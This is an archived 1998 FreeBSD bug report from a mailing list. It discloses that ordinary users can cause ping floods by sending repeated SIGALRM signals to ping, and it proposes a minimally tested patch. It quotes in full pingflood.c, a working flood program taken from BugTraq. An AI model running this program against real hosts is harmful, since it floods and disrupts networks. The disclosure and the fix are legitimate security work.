From owner-freebsd-bugs Fri May 15 17:54:02 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id RAA07487 for freebsd-bugs-outgoing; Fri, 15 May 1998 17:54:02 -0700 (PDT) (envelope-from owner-freebsd-bugs@FreeBSD.ORG) Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id RAA07481 for ; Fri, 15 May 1998 17:53:58 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.8.8/8.8.5) id RAA14686; Fri, 15 May 1998 17:50:01 -0700 (PDT) Received: from forbidden-donut.anet-stl.com (vmailer@forbidden-donut.anet-stl.com [209.83.128.17]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id RAA07379 for ; Fri, 15 May 1998 17:52:47 -0700 (PDT) (envelope-from doogie@forbidden-donut.anet-stl.com) Received: by forbidden-donut.anet-stl.com (VMailer, from userid 1001) id 1C21F09824; Fri, 15 May 1998 19:52:22 -0500 (CDT) Message-Id: <19980516005222.1C21F09824@forbidden-donut.anet-stl.com> Date: Fri, 15 May 1998 19:52:22 -0500 (CDT) From: doogie@forbidden-donut.anet-stl.com Reply-To: doogie@forbidden-donut.anet-stl.com To: FreeBSD-gnats-submit@FreeBSD.ORG X-Send-Pr-Version: 3.2 Subject: bin/6649: normal users can initiate gigantic ping floods Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 6649 >Category: bin >Synopsis: normal users can initiate gigantic ping floods >Confidential: no >Severity: critical >Priority: high >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Fri May 15 17:50:01 PDT 1998 >Last-Modified: >Originator: Jason Young >Organization: ANET St. Louis >Release: FreeBSD 2.2.6-STABLE i386 >Environment: All *BSDs to my knowledge. >Description: A normal user can initiate a gigantic ping flood by flooding a running ping process with SIGALRMs. >How-To-Repeat: This code was posted to BugTraq. Date: Thu, 9 Apr 1998 13:03:04 +0200 From: AntireZ To: BUGTRAQ@NETSPACE.ORG Subject: pingflood.c /* pingflood.c by (AntireZ) Salvatore Sanfilippo enhanced by David Welton I tested it only on Linux RedHat 4.1 and 5.0. David Welton tested it on Debian GNU/Linux and OpenBSD reporting it works. This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; version 2 of the License. ------------------------------------------------------------------------- pingflood.c allows non-root users to 'ping flood'. use it as follows: pingflood WARNING: this program is only for demonstrative use only. USE IT AT YOUR OWN RISK! The authors decline all responsibility for damage caused by misuse of the program. *** if you use this program to cause harm to others, you are very small, petty and pathetic. *** to compile: gcc -o pingflood pingflood.c ------------------------------------------------------------------------- TECHNICAL NOTES When ping runs it normally sends an ICMP ECHO_REQUEST every second. It accomplishes this using the alarm system call and waiting for a SIGALRM signal from the kernel. Pingflood simply sends a lot of SIGALRM signals to the ping process. It can do this because the ping process is owned by the user. Salvatore Sanfilippo */ #include #define PING "/bin/ping" main( int argc, char *argv[] ) { int pid_ping; if (argc < 2) { printf("use: %s \n", argv[0]); exit(0); } if(!(pid_ping = fork())) execl(PING, "ping", argv[1], NULL); if ( pid_ping <=0 ) { printf("pid <= 0\n"); exit(1); } sleep (1); /* give it a second to start going */ while (1) if ( kill(pid_ping, SIGALRM) ) exit(1); } >Fix: My suggested patch. It's had MINIMAL TESTING ONLY. Other fixes or comments welcome. *** ping.c Fri Mar 6 07:07:12 1998 --- ping.c.new Fri May 15 19:40:23 1998 *************** *** 158,167 **** --- 158,168 ---- double tsumsq = 0.0; /* sum of all times squared, for std. dev. */ volatile sig_atomic_t finish_up; /* nonzero if we've been told to finish up */ int reset_kerninfo; volatile sig_atomic_t siginfo_p; + volatile time_t lasttime; static void fill(char *, char *); static u_short in_cksum(u_short *, int); static void catcher(int sig); static void check_status(void); *************** *** 209,218 **** --- 210,220 ---- setuid(getuid()); uid = getuid(); preload = 0; + lasttime = 0; datap = &outpack[8 + sizeof(struct timeval)]; while ((ch = getopt(argc, argv, "I:LQRT:c:adfi:l:np:qrs:v")) != -1) { switch(ch) { case 'a': *************** *** 518,540 **** static void catcher(int sig) { int waittime; struct sigaction si_sa; ! pinger(); if (!npackets || ntransmitted < npackets) (void)alarm((u_int)interval); else { - if (nreceived) { - waittime = 2 * tmax / 1000; - if (!waittime) - waittime = 1; - } else - waittime = MAXWAIT; - si_sa.sa_handler = stopit; sigemptyset(&si_sa.sa_mask); si_sa.sa_flags = 0; if (sigaction(SIGALRM, &si_sa, 0) == -1) { finish_up = 1; --- 520,551 ---- static void catcher(int sig) { int waittime; struct sigaction si_sa; + time_t timenow; ! if (nreceived) { ! waittime = 2 * tmax / 1000; ! if (!waittime) ! waittime = 1; ! } else ! waittime = MAXWAIT; ! ! /* Die if SIGALRM is caught earlier than it should have been. This ! * is usually the result of someone sending thousands of SIGALRMs ! * in an attempt to simulate a ping -f (flood). ! */ ! ! if(time((time_t *)&timenow) < lasttime + waittime) exit(0); ! lasttime = timenow; + pinger(); + if (!npackets || ntransmitted < npackets) (void)alarm((u_int)interval); else { si_sa.sa_handler = stopit; sigemptyset(&si_sa.sa_mask); si_sa.sa_flags = 0; if (sigaction(SIGALRM, &si_sa, 0) == -1) { finish_up = 1; >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message